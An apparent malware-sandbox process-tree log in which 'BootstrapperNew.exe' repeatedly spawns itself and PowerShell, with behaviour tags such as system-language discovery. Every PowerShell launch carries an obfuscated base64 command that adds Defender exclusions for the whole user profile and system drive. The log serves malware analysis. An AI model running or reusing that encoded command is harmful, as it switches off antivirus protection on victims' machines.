        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        260⤵
        
        PID:5976
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        260⤵
        
        PID:7508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        261⤵
        
        PID:6036
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        261⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        262⤵
        
        PID:400
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        263⤵
        
        PID:7620
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        262⤵
        Drops file in Windows directory
        
        PID:6284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        263⤵
        
        PID:6420
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        263⤵
        
        PID:2516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        264⤵
        
        PID:7192
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        265⤵
        
        PID:8008
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        264⤵
        
        PID:548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        265⤵
        
        PID:8112
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        265⤵
        
        PID:2540
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        266⤵
        
        PID:6444
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        266⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        267⤵
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        267⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        268⤵
        
        PID:5252
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        268⤵
        System Location Discovery: System Language Discovery
        
        PID:4688
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        269⤵
        
        PID:7540
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        270⤵
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        269⤵
        
        PID:3416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        270⤵
        
        PID:6128
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        270⤵
        
        PID:3876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        271⤵
        System Location Discovery: System Language Discovery
        
        PID:5508
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        271⤵
        
        PID:7092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        272⤵
        
        PID:6964
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        272⤵
        
        PID:2444
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        273⤵
        
        PID:6664
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        273⤵
        
        PID:5580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        274⤵
        
        PID:2600
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        274⤵
        
        PID:6520
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        275⤵
        
        PID:5988
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        275⤵
        
        PID:7012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        276⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        276⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        277⤵
        
        PID:6504
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        277⤵
        
        PID:6588
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        278⤵
        System Location Discovery: System Language Discovery
        
        PID:1812
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        278⤵
        
        PID:5960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        279⤵
        
        PID:7736
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        280⤵
        
        PID:2516
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        279⤵
        Checks computer location settings
        
        PID:556
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        280⤵
        
        PID:7440
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        280⤵
        
        PID:7860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        281⤵
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        281⤵
        Checks computer location settings
        
        PID:5604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        282⤵
        
        PID:6828
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        282⤵
        
        PID:5608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        283⤵
        
        PID:1664
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        283⤵
        Drops file in Windows directory
        
        PID:7380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        284⤵
        
        PID:3016
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        284⤵
        
        PID:1060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        285⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        285⤵
        Checks computer location settings
        
        PID:8132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        286⤵
        
        PID:6728
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        286⤵
        Drops file in Windows directory
        
        PID:1424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        287⤵
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        287⤵
        
        PID:6560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        288⤵
        
        PID:6668
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        289⤵
        
        PID:6476
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        288⤵
        
        PID:7860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        289⤵
        
        PID:7076
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        289⤵
        
        PID:5928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
        290⤵
        System Location Discovery: System Language Discovery
        
        PID:3932
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        290⤵
        Checks computer location settings
        
        PID:5904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
